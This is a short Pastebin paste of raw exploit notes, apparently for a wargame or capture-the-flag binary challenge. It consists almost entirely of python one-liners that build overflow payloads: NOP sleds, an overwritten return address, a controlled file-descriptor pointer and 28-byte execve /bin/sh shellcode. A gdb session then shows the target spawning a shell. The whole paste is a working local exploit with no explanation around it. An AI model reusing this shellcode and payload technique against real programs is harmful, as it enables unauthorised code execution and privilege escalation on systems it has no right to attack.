Advertisement
sakiir

binary10

Nov 15th, 2014
212
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.30 KB | None | 0 0
  1. &FD = \x08\xb0\x04\x08 (0x804b008)
  2.  
  3. controlling FD:
  4. !echo $(python -c 'print "USERNAME=" + "A" * 136 + "\x08\xb0\x04\x08"') > /tmp/lol
  5. !echo $(python -c 'print "USERNAME=" + "\x90" * 28 + "EIPP" + "\x90" * 76 + "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80" + "\x08\xb0\x04\x08"') > /tmp/lol
  6.  
  7. !echo $(python -c 'print "USERNAME=" + "zGMPOIMbhDCbwOZmzaNuIc1HKRKxzeSZbUpmZe14vDPC9M1eA6MW852OT7PYPxW3fhVfpFt0DYQQ6OSLlIgbBrKTl45yfTKYvoYUaxBh7bEZpcH1JNw4xGyKZ2V4ILPIIUy3jfbs" + "\x08\xb0\x04\x08" + "B" * 28 + "ZZZZ"') > /tmp/lol
  8. |
  9. |
  10. \
  11. \
  12. -> 0x5a53657a = zeSZ
  13.  
  14. !echo $(python -c 'print "USERNAME=" + "\x90" * 28 + "EIPP" + "\x90" * 104 + "\x08\xb0\x04\x08" + "B" * 28 + "ZZZZ"') > /tmp/lol
  15.  
  16. !echo $(python -c 'print "USERNAME=" + "\x90" * 28 + "\x24\xfb\xff\xbf" + "\x90" * 76 + "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80" + "\x08\xb0\x04\x08" + "B" * 28 + "ZZZZ"') > /tmp/lol
  17.  
  18. gdb$ unset env LINES
  19. gdb$ unset env COLUMNS
  20. gdb$ r /tmp/lol
  21. process 18692 is executing new program: /bin/bash
  22. sh-4.2$
  23.  
  24.  
  25. 0xbffffb24 = \x24\xfb\xff\xbf
  26.  
  27. shellcode \x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80
  28. exec /bin/sh 28 Bytes
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement